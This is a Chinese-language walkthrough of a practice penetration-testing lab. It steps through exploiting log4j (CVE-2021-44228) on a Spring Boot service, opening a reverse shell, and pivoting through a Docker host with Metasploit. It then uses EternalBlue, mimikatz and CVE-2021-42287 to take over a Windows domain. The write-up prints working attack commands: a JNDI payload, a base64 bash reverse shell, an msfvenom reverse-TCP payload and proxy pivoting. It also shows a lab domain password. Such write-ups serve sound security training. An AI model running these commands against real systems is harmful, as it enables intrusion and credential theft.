靶场下载链接

链接: https://pan.baidu.com/s/1zRhkpk-GBltPftYwrYrFmA 提取码: r2pe
–来自百度网盘超级会员v6的分享

信息探测

1、用arp探测工具netdiscover扫描192.168.22.0段

netdiscover -i eth0 -r 192.168.22.0/24

image-20220418132802650

2、masscan扫描端口

masscan -p 1-100,443,10000-40000 192.168.22.128 --rate=100

image-20220418142052458

3、使用nmap进行端口信息探测

nmap -Pn -A -p 80,38080 192.168.22.128 -sV -oA  attack-ports

image-20220418142244411

后期IP发生变化,第一层靶机IP更改为192.168.22.129。

第一层WEB渗透

1、访问38080页面,spingboot组件查看页面与图标确认是spingboot组件

image-20220417001308934

2、扫描目录看有没有Spring未授权访问漏洞,扫描到hello路径,访问提示Request method ‘GET’ not supported,使用post传参

image-20220417174051195

image-20220417174116573

3、测试是否存在log4j2漏洞,使用dnslog测试,确认存在CVE-2021-44228漏洞

payload=${jndi:ldap://i3j9do.dnslog.cn}

image-20220417182722459

image-20220417182632823

4、利用jndi注入工具来实现,在kali中开启rmi服务和构造反弹shell的恶意类

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64加密后的反弹shell命令}|{base64,-d}|{bash,-i}" -A "x.x.x.x.x"

image-20220417183020152

5、nc开启监听

nc -lnvvp 4444

image-20220417183108640

6、使用hackbar发送工具生成的rmi请求,挨个进行尝试

image-20220417183259761

7、成功反弹shell

image-20220417183315270

8、查看文件,发现存在.dockerenv,判断当前为docker内

image-20220417183414349

9、想远程下载监测脚本,发现没有curl、wget、scp、vi、vim等命令

10、找寻文件,在root目录下发现flag.txt,得到貌似账号密码

image-20220417185236623

11、ssh连接,成功登陆并获得root权限,发现内网IP10.0.1.6

image-20220417185336816

image-20220417190218069

第二层 内网渗透

1、使用linux脚本进行主机探测

#!/bin/bash
for i in {1..254};do
 ping -c1 -W1 10.0.1.$i \
 && echo "10.0.1.$i" is alive >> ip.txt;
done

image-20220417192607061

2、使用kali生成msf马

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.1.14 LPORT=5555 -f elf > shell.elf

image-20220417190540386

3、打开msf进行监听

image-20220417190851136

4、将msf马上传到第一层靶机,并运行,成功监听到shell

chmod +x ./shell.elf
./shell.elf

image-20220417190945261

image-20220417190953318

5、内网路由添加

run post/multi/manage/autoroute

image-20220417191058582

6、开启socks代理

use auxiliary/server/socks_proxy
set srvhost xxx.xx.xxx.xxx  #(如果不行试试0.0.0.0)
set srvport xxx             #端口号
run 												#运行
jobs												#查看后台任务

image-20220417191310992

7、在/etc/proxychains4.conf添加代理

image-20220417191444488

8、使用nmap进行端口扫描,开启445端口,测试是否存在永恒之蓝漏洞

proxychains4 nmap   -Pn -sT --top-ports 100  10.0.1.7

image-20220417192752747

9、使用代理启动msf

proxychains4 msfconsole

image-20220417193004411

10、使用ms17010模块测试,存在永恒之蓝漏洞

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 10.0.1.7
run

image-20220417193055387

11、使用ms17010自动化攻击模块,因为挂代理问题,总是无法正常得到shell

image-20220417193555049

12、可根据http://www.bw08.top/archives/duoceng进行操作,这里不赘述了

image-20220417200411350

13、拿到win7权限后使用mimikatz,得到域账号root/Red12345

image-20220417200735488

14、在桌面找到第二个flag

image-20220417201218548

15、net time定位域控

image-20220417201651439

16、nltest /domain_trusts定位域

image-20220417201741446

17、通过ping定位到域控地址

image-20220417201838607

18、添加路由

image-20220417203312887

19、 得知域用户,使用CVE-2021-42287直接到域控,exp链接,目前只能在kali上反弹到shell

image-20220418131023490

20、得到最终flag

image-20220418131405801

下一篇